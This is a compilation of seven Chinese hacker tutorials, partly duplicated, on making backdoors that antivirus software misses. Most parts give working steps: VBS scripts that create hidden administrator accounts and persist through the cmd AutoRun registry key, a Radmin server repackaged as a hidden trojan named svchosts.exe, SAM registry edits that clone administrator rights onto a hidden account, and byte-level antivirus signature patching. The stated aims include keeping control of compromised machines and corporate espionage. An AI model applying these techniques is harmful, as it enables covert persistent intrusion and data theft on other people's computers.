下面是小编帮大家整理的教你打造杀毒软件免杀的后门,本文共7篇,欢迎阅读,希望大家能够喜欢。
篇1:教你打造杀毒软件免杀的后门
在安全观念日益强化的今天,想得到台属于自己的肉鸡是不易的,如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话,那就是世间最痛苦的事了,相信大家都不会希望这种事情发生在自己的身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼的问题,而好后门的关键就在于是否会被查杀,下文一起来看看如何打造出自己的免查杀后门吧!
Superdoor3.0这款软件大家都用过或者听过吧?它只有一个可执行程序,文件本身很小,命令简单,运行后,可以起到隐藏账号的效果,管理员在CMD下用“net user”查看
door <用户名>:<口令>
小提示:Superdoor3.0(超级后门3.0),超级用户隐藏器。
运行环境:测试通过(须VB运行库)。
运行方法:door <用户>:<密码>例:administrator:123。
功能:它在打开“计算机管理”和CMD时把用户删掉,管理员看过用户后,关闭“计算机管理”或CMD时,用户又回来了,巧妙地躲开管理员的查看,是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易,后门被发现也很容易。我使用杀毒软件(Norton Anti Virus)查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
哎,看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后,再运行CMD命令行回在它上面多出一句:“c:\WINNT\system32\crnd.exe“不是外部或内部命令,也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找,发现程序写入下面两个键值:
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先看看这两个位置的介绍:如果/D未在命令行上被指定,当Cmd.exe运行时,它会自动寻找以下Reg_sz/reg_expand_sz注册表变量,
如果其中一个或两个都存在,这两个变量会先予执行。也就是说,只要启动了CMD就会运行上述的脚本,可以说是CMD关联吧。
达到“账号如果被撤除,运行CMD又恢复”的效果,原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件,保存在C:/winnt/system32/下,内容如下:
dim wsh
set wsh=CreateObject(”WScript.Shell“)
wsh.run ”net user hsmw$ qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add“,0
wsh.run ”net user guest /active:yes“,0
wsh.run ”net user guest qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add“,0
上面一段VBS的意思就是建立个hsmw$的账号,并且加为高级管理组,设置密码为QQ26836659,激活Guest账号,并且加为高级管理组,设置密码为qq26836659。写入注册表中下面的键,关联CMD达到不死的效果:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run
小提示:在账号后面加入$是为了在输入“net user”时不被轻易地发现,虽然是个“不死账号”,但是在计算机管理可以轻易的查到。
篇2:打造个性化免杀版防火墙、杀毒软件服务器教程
前言:
众所周知,现在越来越多的病毒爱好者为了展示个人能力或一些不可告人的秘密而制作一系列的病毒程式;不过,由于国内大部分用户对网络安全有了更多的了解,都会在自己系统中安装使用防火墙或杀毒软件来保护自己的系统网络安全!因此,这类安全软件的存在成了这些病毒的“拌脚石“,如何扫除这些“拌脚石”也就成了他们所追求的另一种境界:“让病毒程式在系统中如入无人之境”!
常见的病毒保护技术:
加壳压缩或加密(主要是采用网络中流行的加壳程序);
修改病毒程式中的特征码(躲避杀毒软件中的特征码扫描);
在病毒程式激发其功能模块时先检测系统中的安全软件,如存在,则进行清除;
采用内核式、服务级编程方式,使得大部分杀毒软件能查无法清除,此类病毒技术性较强,随着Rootkit源码的公开,该方式也迅速传播…
………
这里讨论病毒保护方式3中的防护方法“打造个性化免杀版安全软件”
1、避开“进程扫描式”追杀;
要避开这种方式的追杀只需要修改主程序文件名就可以避开病毒所采用的“进程扫描式”追杀;
2、避开FindWindowFindWindowExA()函数的追捕;
hwnd=FindWindow(”TApplication“,vbNullString) ;查找特征窗口类名
hwnd=FindWindow(vbNullString,”Pfw“) ;查找特征窗口标题
该方式主要是防止此类函数扫描窗口名或类名以此终止安全软件的运行;使用OllyDbg或SoftICE载入需要打造的防火墙程序PFW.ExE,设置断点USER32.CreateWindowExA()
部分代码:
004EA2B8 /$Content$nbsp; 55 push ebp004EA2B9 |. 8BEC mov ebp,esp
004EA2BB |. 53 push ebx
004EA2BC |. 8B5D 08 mov ebx,dword ptr ss:[ebp+8]
004EA2BF |. 53 push ebx ; /lParam
004EA2C0 |. 8B5D 0C mov ebx,dword ptr ss:[ebp+C] ; |
004EA2C3 |. 53 push ebx ; |hInst
004EA2C4 |. 8B5D 10 mov ebx,dword ptr ss:[ebp+10] ; |
004EA2C7 |. 53 push ebx ; |hMenu
004EA2C8 |. 8B5D 14 mov ebx,dword ptr ss:[ebp+14] ; |
004EA2CB |. 53 push ebx ; |hParent
004EA2CC |. 8B5D 18 mov ebx,dword ptr ss:[ebp+18] ; |
004EA2CF |. 53 push ebx ; |Height
004EA2D0 |. 8B5D 1C mov ebx,dword ptr ss:[ebp+1C] ; |
004EA2D3 |. 53 push ebx ; |Width
004EA2D4 |. 8B5D 20 mov ebx,dword ptr ss:[ebp+20] ; |
004EA2D7 |. 53 push ebx ; |Y
004EA2D8 |. 8B5D 24 mov ebx,dword ptr ss:[ebp+24] ; |
004EA2DB |. 53 push ebx ; |X
004EA2DC |. 51 push ecx ; |Style
004EA2DD |. 52 push edx ; |WindowName ;窗口标题
004EA2DE |. 50 push eax ; |Class ;程序类名
004EA2DF |. 6A 00 push 0 ; |ExtStyle. = 0
004EA2E1 |. E8 7C010>call ; CreateWindowExA
004EA2E6 |. 5B pop ebx
004EA2E7 |. 5D pop ebp
004EA2E8 . C2 2000 retn 20
篇3:高手教你打造完美后门
有一次,Cytkk成功取得了北京某广告公司创意部门计算机的Shell,准备窃取某个重要商业资料,在搜寻到的一份项目进度报告书中,他发现原本需要的创意设计被推迟到两天后由设计部门提交。Cytkk只得想办法在此台计算机上留下后门,以待两天后重回旧地守株待兔……
完美后门
因为这是笔大买卖,所以不容有闪失。作为商业间谍的Cytkk知道,信誉非常重要。
凭借着职业的敏锐感,Cytkk开始飞快思索后门的“人选”。普通的木马程序当然是不能用的,因为防病毒软件可不是吃素的……正在难于抉择之际,一款商业软件的名字跃然闪现在Cytkk的脑海——Radmin!一款商业化的远程控制软件。
既然Radmin有着商业软件的外衣,那自然杀毒软件也就不会与它为难!但Radmin虽说不会被查杀,但却有着先天的不足——服务端运行后在任务栏有图标显示,且服务端由3个文件组成(1个EXE文件,2个DLL文件),需要人工在服务端填写口令才可以正常连接并操控,而且最令人头痛的是服务端不具备自启动功能。
想到这些,Cytkk眉头微皱,但凭借着多年的技术敏锐感,一款改造后的Radmin服务端形象出现在脑海里,一个完美的木马后门:服务端由单一EXE文件组成,运行后无明显痕迹、无需人工干涉即可自动填写注册信息到注册表,添加自身到系统服务启动项……Cytkk就这么一边构想着,一边将鼠标移到了自己电脑的“开始”菜单上……
改造Radmin
1.Cytkk决定先去除Radmin在服务端运行后的任务栏标志。进入Radmin“服务端设置”中的“设置参数”(见图1),在“隐藏状态栏图标”前打上√,这样原本在服务端运行后会在状态栏有图标的弊端就剔除了。
2.然后根据自己的需要,更改连接端口号,设置成不常用的1986端口。其它地方可不作修改(值得注意的是“日志”选项,千万不要因为错选“保留记录文件”从而留下“罪证”),点击“确定”退出。
3.点选“设置密码”来设置连接时的密码******。
4.一切设置妥当后,Cytkk先在自己机子上安装了服务(因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序内,而是在相关的注册表键值内)。待软件提示成功安装服务后,Cytkk打开注册表编辑器,找到:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 键值,点击“导出注册表”并保存成单独的r_server.reg文件,用记事本打开后,发现其中内容如下(根据设置的不同,参数会略有出入):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\Parameters]
”NTAuthEnabled“=hex:00,00,00,00
”Parameter“=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(这里是连接密码!其它信息不影响操作,所以不需要掌握)
”Port“=hex:c2,07,00,00(连接服务端时用的端口)
”Timeout“=hex:0a,00,00,00
************************
”LogFilePath“=”c:\\logfile.txt“
”FilterIp“=hex:00,00,00,00
”DisableTrayIcon“=hex:01,00,00,00(01表示隐藏系统右下角的图标,如改成00图标就会被显示)
”AutoAllow“=hex:00,00,00,00
”AskUser“=hex:00,00,00,00
”EnableEventLog“=hex:00,00,00,00
5.最后Cytkk麻利地在桌面新建了一个setup.bat批处理文件,在里面添加如下脚本:
@echo off
*********************** (自动安装Radmin服务端)
regedit.exe -s %SystemRoot%\system32\r_server.reg >nul (自动将r_server.reg内的配置信息导入目标机注册表)
net start r_server >nul (启动r_server服务端服务)
*******************************(删除信息文件)
del %0
注意:文中代码后括号内的内容为注释,勿输入,
超级捆绑
由于Radmin并不是“木马型”监控软件,所以它的服务端是由r_server.exe、raddrv.dll、AdmDll.dll三个文件组成,而一般的“木马”服务端通常只有一个可执行文件。这是个比较麻烦的硬伤,但这难不倒Cytkk,他熟练地运行了一款名为“超级捆绑”的软件。
1.在界面点击右边白色图标,将Radmin服务端的三个文件添加进文件列表,捆绑方式设置成“按文件捆绑方式”,然后点击右边的“高级”按钮进入详细设置,在“常规”选项内(图2),将图标自定义为一个文本文件以增加更好的隐蔽性,文件大小则采用默认。
2.随后,Cytkk又将“属性”中的“只读”、“隐藏”和“系统”三项全部选中,这样就使捆绑后的文件更具隐蔽和安全性。
3.Cytkk点击“运行”标签,出现捆绑程序运行设置,将文件分解运行目录设置成 “在捆绑后的文件所在目录中运行”,窗口状态则设为“隐藏窗口”。
4.他将“参数”页面内的全部个性化设置选项前面的√取消。点击“确定”退回上级窗口,最后设置好捆绑文件输出路径。为了增强隐蔽性,可以将捆绑后的执行文件更名,Cytkk将它命名为svchosts.exe。
5.点击“合并”就完成了服务端的文件捆绑工作。现在的Radmin已经基本上从一款商业化的远程控制软件变成了一个不折不扣的木马了。
善后
到此,Cytkk认为整个改造工作差不多完成了,马上进行关键的收尾工作,即将编辑好的setup.bat以及最先导出的r_server.reg连同捆绑后的svchosts.exe这三个文件用WinRAR打包成自解压程序。
篇4:分解后门查核心―打造杀毒软件通过的后门
分解后门查核心――打造杀毒软件PASS的后门
在安全观念日益强化的今天,想得到台属于自己的肉鸡是不易的,如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话,那就是世间最痛苦的事了,相信大家都不会希望这种事情发生在自己的身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼的问题,而好后门的关键就在于是否会被查杀,下文一起来看看如何打造出自己的免查杀后门吧!
Superdoor3.0这款软件大家都用过或者听过吧?它只有一个可执行程序,文件本身很小,命令简单,运行后,可以起到隐藏账号的效果,管理员在CMD下用“net user”查看用户账号,或者用计算机管理来维护用户账号时,账号都会自动隐藏。使用方法也特别简单,只需要键入如下命令就行了:
door <用户名>:<口令>
小提示:Superdoor3.0(超级后门3.0),超级用户隐藏器。
运行环境:测试通过(须VB运行库)。
运行方法:door <用户>:<密码>例:administrator:123。
功能:它在打开“计算机管理”和CMD时把用户删掉,管理员看过用户后,关闭“计算机管理”或CMD时,用户又回来了,巧妙地躲开管理员的查看,是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易,后门被发现也很容易。我使用杀毒软件(Norton Anti Virus)查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
哎,看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后,再运行CMD命令行回在它上面多出一句:“c:\WINNT\system32\crnd.exe”不是外部或内部命令,也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找,发现程序写入下面两个键值:
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先看看这两个位置的介绍:如果/D未在命令行上被指定,当Cmd.exe运行时,它会自动寻找以下Reg_sz/reg_expand_sz注册表变量。如果其中一个或两个都存在,这两个变量会先予执行。也就是说,只要启动了CMD就会运行上述的脚本,可以说是CMD关联吧。
达到“账号如果被撤除,运行CMD又恢复”的效果,原理就是这样的了,
现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件,保存在C:/winnt/system32/下,内容如下:
dim wsh
set wsh=CreateObject(“WScript.Shell”)
wsh.run “net user hsmw$Content$nbsp;QQ26836659”,0
wsh.run “net localgroup administrators hsmw$Content$nbsp;/add”,0
wsh.run “net user guest /active:yes”,0
wsh.run “net user guest QQ26836659”,0
wsh.run “net localgroup administrators hsmw$Content$nbsp;/add”,0
上面一段VBS的意思就是建立个hsmw$的账号,并且加为高级管理组,设置密码为QQ26836659,激活Guest账号,并且加为高级管理组,设置密码为QQ26836659。写入注册表中下面的键,关联CMD达到不死的效果:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run
小提示:在账号后面加入$是为了在输入“net user”时不被轻易地发现,虽然是个“不死账号”,但是在计算机管理可以轻易的查到。
我们添加完例如“?$”这样账号以后,在注册表中找到这个有字符“$账号”对应的ID值,具体的位置在:
KEY_LOCAL_MACHINE\SAM\SAM\ Domains\Account\User
将有字符$账号对应的ID的键值修改为一个不存在的ID键值。例如:某账号的键值为0x4eb,修改为0x6eb,那么这个含有字符$的账号就没有ID了,重新启动后,用户管界面里也就看不到这个账号了!
这里需要注意一点,要打开注册表中的SAM需要System权限,Admin权限是不行的,不过不要着急。这里我们可以用Psu这个软件轻松提升权限,先用Pslist查看Winlogon.exe的PID值为212,然后输入“Psu -p regedit -i 212”就可以了。
好了,前面的VBS的功能是在CMD下用“net user命令”看不见,后者是在计算机管理里看不见,结合起来一个新的后门出世了,用杀毒软件来查一查:PASS!哈哈,成功!
有不足之处,还请赐教,谢谢!
篇5:从杀毒软件的机制展望未来免杀技术
gs1982k
现在主流的免杀技术基本上都是基于花指令、保护壳、修改特征码来实现木马免杀的,首先有必要简单回顾一下免杀技术的发展史。
关于现今主流的免杀技术(国内),大概可以追溯到,这时候免杀技术只掌握在少数人手中,并没有公开化,记得没错的话,他应该是和灰鸽子配套使用的。当时国内的主流杀软主要有 瑞星,金山,江民,诺顿。(呵呵,到了卡巴才慢慢登场),当时的杀软远没有现在强大,基本连实时监控都不具备,基本查杀病毒全靠特征码来定位,甚至连符合特征码都没有。当然,那时候木马基本少的可怜,说的上名的 也就是 广外女生 冰河之类,呵呵 这时候有灰鸽子的人还是非常少的,这时候灰鸽子基本中了就得重做系统,因为这时候的杀软还解决不了进程注入,HOOL API这样的木马,要不怎么说鸽子是远控的里程碑呢。
到了底 05年初 随着杀软的进步,鸽子已经可以被杀软KILL了,修改特征码和加花指令 保护壳的技术开始逐渐在一些大牛中流传,这时候一些辅助工具也出现了 比较有代表的是 BoLer 以及 CCL,这2款软件基本只能定位单一特征码,即使这样,加了花指令和修改了特征码的鸽子也所向无敌了。随后修改特征码的技术也开始以收费的形式开始在次一级的 圈内传播。这时候 比较有名的是 动画吧的浩天出的 免杀教程系列,现在基本所有的教程都是以他的教程为蓝本。传播范围最广,也是最经典的。 同年 卡巴开始逐渐进入到中国的时常,当时是KAV5 不知道还有人有印象没,在05年底的时候 KAV6开始比较普及了,于其他杀毒软件相比,KAV6多了实时监控,以及通过复合特征玛来查杀木马。然后,我们现在经常使用到的如MYCCL,MULTI_CCL,TK.LOADER开始在 群中流行,可以说 通过这几款软件以及花指令 加壳技术,杀软几乎是束手无策的。同时,鸽子也逐渐由少数人拥有,扩散到绝大多数人拥有,比较经典的版本就是 “黑防鸽子”,基本现在所有的鸽子都是从“黑防鸽子”转换而来。
从某种意义上来说 06-,是鸽子最辉煌的2年,但是随着杀软的进步,实时监控技术的不断进步,鸽子的发展空间越来越小,从05年使用鸽子可以轻易感染上万台机器,同时很难被清除。到07年 感染机器很难过千,同时存活时间短也成了最大的问题,当时主要还是流行用各自进行流氓软件的安装,游戏 ,以及DDOS之类。呵呵,那时候下载者才刚刚出来,也只在少数人中流动。这时候,鸽子的缺点也越发明显 第一 体积过大(不加壳的400多K),第二 插入进程的方式已经成为杀软的头号拦截对象 第三 特征码太多。在很短的时间里,鸽子迅速被PCSHARE淘汰掉,PCSHARE的驱动隐藏,端口复用,体积小,一下子成为07-08的主流远控。
从07年开始出现主动防御,到现在,随着主动防御技术以及病毒库的快速更新(从05年的7天一更新到现在的2小时一更新)市面上主流远控的活动空间也在急剧收缩。第一 传统的免杀方式很难过主动防御了,随着主动防御技术的不断完善 第二 免杀的木马存活周期过短。
拿现在主流使用的鸽子和PC来说,基本上流传的就是固定的几个版本,也就是说,大家手中远控的蓝本基本都差不多,
这就存在这样一个问题:对于同一个木马A来说,其原始特征玛假设只有2处,虽然10个人,每个人的修改方式不尽相同,但是 对于一款木马来说 这点修改可能只占到总代码的%0.01,换句话说,其余的%99.99都是相同的,当其中一个人的木马被杀软中心截获到并重新定位特征码后,很有可能这个重定位的特征码这10个人免杀过的小马都有,这样只要病毒库一升级,基本会导致大部分被KILL,对于家鸡来说,掉了无所谓,但是对于一些重要的服务器来说,这足以致命。
现在再来谈一下主动防御,主动防御如果笼统的来理解的话,可以简单定义为 通过程序的行为来判定是否为病毒,从而进行拦截。比如说 木马常常会用到 HOOK SSDT,线程注入,替换服务,模块注入。一般的软件很难用到以上的这些技术,如果使用以上技术,那么势必会调用相应的API函数,这样杀软只需要对调用的API和执行过程进行匹配,很容易发现木马。尤其是对一些已知的木马,比如灰鸽子,PCSHARE,由于大面积的使用和发布,其释放文件的步骤,调用的API太容易被监控到了。无论怎么改特征码,这些行为特征想要改变基本不太可能。
所以说,现在的免杀技术被杀软淘汰掉只是时间问题,尤其是在一些常用的,很容易下载到的马身上更能体现出来。当然,这世界没有无敌的技术,主动防御也并非牢不可破。从现在木马的发展来看,以后免杀大概会围绕以下4个方向展开。
第一 使用为公布的RING0级的API编写木马,由于IDA逐渐开始普及,越来越多RING0级的API被公布出来,比如ZW系列的,同时这条路会走的更远,毫无疑问 使用未公布的API编写木马的核心代码,是绝对过主动防御的。
第二 基于原码的免杀,随着木马的发展,木马功能的模块化也是发展趋势之一,基与同一功能有不同的实现方式,比如文件传输可以通过 SOCKET 或者 FTP 或者HTTP来实现,对于原码的功能模块替换也会成为未来主流免杀的方式之一。
第三 破坏杀软的监控 对于一个过表面的流行马想过杀软的主动防御来说,破坏杀软的监控是个不错的选择,WINDOWS本身就是个很不安全的操作系统,在获取杀软的有效句柄后,最少有几十种方式使的杀软非正常退出,从而达到强穿主动防御的目的。
第四 X-CODE的寄生技术 这项技术在国内应用的最少,这里还是提一下,X-CODE主要是指将代码插入到PE文件中的技术,这里我要说的是,这于传统的感染PE文件的方式不同,一般来说,国内都喜欢给PE文件增加一个区段,把代码插入到区段中去,现在这样很难避开杀毒软件的查杀。举例来说明一下
拿一个典型的PE文件头来说 一般他会占用300h字节的空间,其最小对齐段是200h字节,这样就会留下一个很小的空闲空间,这段空间就可以用来插入我们的代码,对于一个PE文件来说,其空白空间是很多的,多但是不连续,一般还比较小。这里有2个问题要解决,第一 首先要代码根据需要分割成一段一段的 第二 要保证分割开来的代码能在PE文件中加载并执行。当满足这2个条件,你会发现,X-CODE是多么强悍的技术。
就写到这里吧,希望大家都能看懂。没涉及什么代码,呵呵。
篇6:高手打造免杀Topo工具程序
教你打造不被杀的Topo工具程序,开始:
首先,关闭文件实时防毒,这点很关键,如果打开了,你用病毒特征码定位器是无法打开topo12.exe的,建一个临时文件夹作为存放生成临时文件用的目录,然后打开病毒特征码定位器,整体参数设置,手动操作,使用自定义路径,输入刚才你建的目录,确定,再设置手动操作,选“每次替换规定字节大小”,替换大小改为32(这里可以先改大点,然后再改小,下面会说到)。好了,可以开始生成了。可能有人会问,为什么不用自动操作呢?这是因为我觉得手动的方便,自动的操作太慢了,而且我的毒霸文件实时防毒有时还不能杀掉,不方便,所以用手动。可能我用的软件版本太低了,最新版应该有所改变。但手动需要了解这个特征码定位器的工作原理。
下面我就根据自己的理解来说一下原理。杀毒软件是用特征码来判断是否是病毒的,特征码不会太多,也不会太长,因为太多太长会影响杀毒速度。而特征码定位器的工作原理就是把待分析的文件一段一段的字节替换为0(我们这里是32个为一段),其它代码保留,然后让杀毒软件去查毒,如果被杀掉了,就说明没替换的部分有特征码,如果没杀掉,就说明没有替换的部分已经没有特征码了,那么特征码一定在被替换的部分,这时就可以知道应该修改哪一段的代码了。用特征码来判断是否是病毒有个缺点,就是特征码是静态的,只要改一下代码实现相同的功能,特征码搜索就会失败,这样就不会报有毒了。原理看不懂不要紧,下面再详细操作一下就能理解了。
用病毒特征码定位器打开topo12.exe,出现pe文件段选择,然后添加所有的区段,确定,然后会告诉你硬盘空间是否够,如果不够就换一个大点的盘,在根目录下建一个目录,实在不行就去作者论坛www.vxer.net/bbs 去问一下作者吧。(这里关于空间大小的问题我也不太懂,我用默认的路径它说我空间不够,我空间明明够的。。。知道的人请指点一下)然后go,完成后就最小化吧,等会再用。打开杀毒软件,杀毒选项是查所有软件,查到后删除,然后查一下生成文件的目录,查完后看看剩下哪几个文件,选结果定位,选刚才那个目录,然后会出现特征码的位置和大小,我这里是三个
-------------定位结果------------
序号 起始偏移 大小 结束偏移
0001 00000400 00000020 00000420
0002 00001260 00000040 000012A0
0003 000014C0 00000060 00001520
看看目录里的文件,剩下了6个,这是什么意思呢?就是这6个文件里不含有特征码,由此可以说明,topo的特征码不止一处,有三处,而三处都相同才证明这是病毒,有一个不同都不算病毒,那么我们只要改一个地方就可以了。注意,这里是文件偏移,不是内存里的偏移,要转换,400相当于00401000,看一下特征码的位置,第一个和第二个在代码区,第三个在数据区,一般来说改代码区的容易些,因为数据区数据一改可能就会用不了,只要代码功能相同没有校验,代码改掉是没关系的,
但是一看第二个位置,在文件的输入表上,这样就不好改了,输入表是不能随便改的,加上这段特征码可能是为了区分其它病毒用的,所以我们改第一个位置。
而第一个位置大小有20h(32字节)太大了,32字节有很多命令的,代码不好改,所以我们这次改成1,把大小缩成最小,再生成一次,。有人会问,为什么第一遍就改小点呢?因为第一遍是不知道位置在哪,是确定位置的,文件会生成很多的,效率不高,确定了位置后可以不全部覆盖所有文件,只覆盖你需要的区域,这样第二遍生成的文件可以少很多。同样,添加区段,这时只要添加第一区段,起始位置00000400,检测大小00000020,(只要这么小就够了,因为我们知道其它的地方是没有用的,不需要浪费时间),添加,确定,然后go,查毒,结果定位,呵呵,看到结果了吗?
-------------定位结果------------
序号 起始偏移 大小 结束偏移
0001 00000400 00000001 00000401
0002 00000402 00000003 00000405
只有第1,3,4,5四个字节是特征码,(特征码可真短啊,难怪那么快)。所以,只要改掉前5个字节就行了。
topo12.exe的入口代码如下
00401000 >/$Content$nbsp;6A 00 push 0 ; /pModule = NULL
00401002 │. E8 690E0000 call
00401007 │. A3 A0384000 mov dword ptr ds:[4038A0],eax
0040100C │. 6A 00 push 0 ; /lParam = NULL
0040100E │. 68 2C104000 push topo12.0040102C ; │DlgProc = topo12.0040102C
篇7:教你搞定不会被杀毒软件查杀的Windows后门
在入侵目标后,通常会在目标电脑上留下后门,以便长期控制这台电脑,可是后门终归是 工具,是杀毒软件的查杀目标之一,可能杀毒软件升级后后门就被删除了。但是有一种后门是永远不会被杀毒软件查杀的,就是隐藏的系统克隆帐户。
克隆帐户是最隐蔽的后门
在Windows中(XP、Vista、Windows7等均如此),每一个帐户在注册表中都有对应的键值,这个键值影响着该帐户的权限。当 在注册表中动手脚复制键值后,就可以将一个用户权限的帐户克隆成具有管理员权限的帐户,并且将这个帐户进行隐藏。隐藏后的帐户无论是在用户管理还是命令提示符中都是不可见的。因此一般的计算机管理员很少会发现隐藏帐户,危害十分巨大。
用命令行模式添加帐户
点击开始运行,输入cmd运行命令提示符,输入如下命令:net user test$ /add并回车,这样就可以在系统中建立一个名为test$的帐户。继续输入:net localgroup administrators test$ /add并回车,这样就可以把test$帐户提升到管理员权限。
● 添加一个隐藏帐户
点击开始运行(Win7中可以在开始菜单的搜索框里面输入regedt32或者regedit),输入regedt32.exe后回车,弹出注册表编辑器,
在regedt32.exe中来到HKEY_LOCAL_MACHINE\SAM\SAM处
点击编辑菜单权限,在弹出的SAM的权限编辑窗口中选administrators帐户,在下方的权限设置处勾寻完全控制,完成后点击确定即可。
● 设置注册表操作权限
在运行中输入regedit.exe运行注册表编辑器,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\AccountUsers\Names处,点击隐藏帐户test$,在右边显示的键值中的类型一项显示为0x404,向上来到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\AccountUsers处,可以找到00000404这一项,这两者是相互对应的,隐藏帐户test$的所有信息都在00000404这一项中。同样的,我们可以找到administrator帐户所对应的项为000001F4。
将test$的键值导出为test$.reg,同时将00000404和000001F4项的F键值分别导出为user.reg,admin.reg。用记事本打开admin.reg,将其中F值后面的内容复制下来,替换user.reg中的F值内容,完成后保存
● 查找隐藏帐户对应键值
在命令提示符中输入net user test$ /del命令,将我们建立的隐藏帐户删除。别紧张,这一步只是删除了隐藏帐户的空壳,就像入侵后清理痕迹一样,做好的隐藏帐户是不会发生改变的。最后,我们双击test$.reg和user.reg这两个注册表文件,将它们导入到注册表中就大功告成了。
文档为doc格式
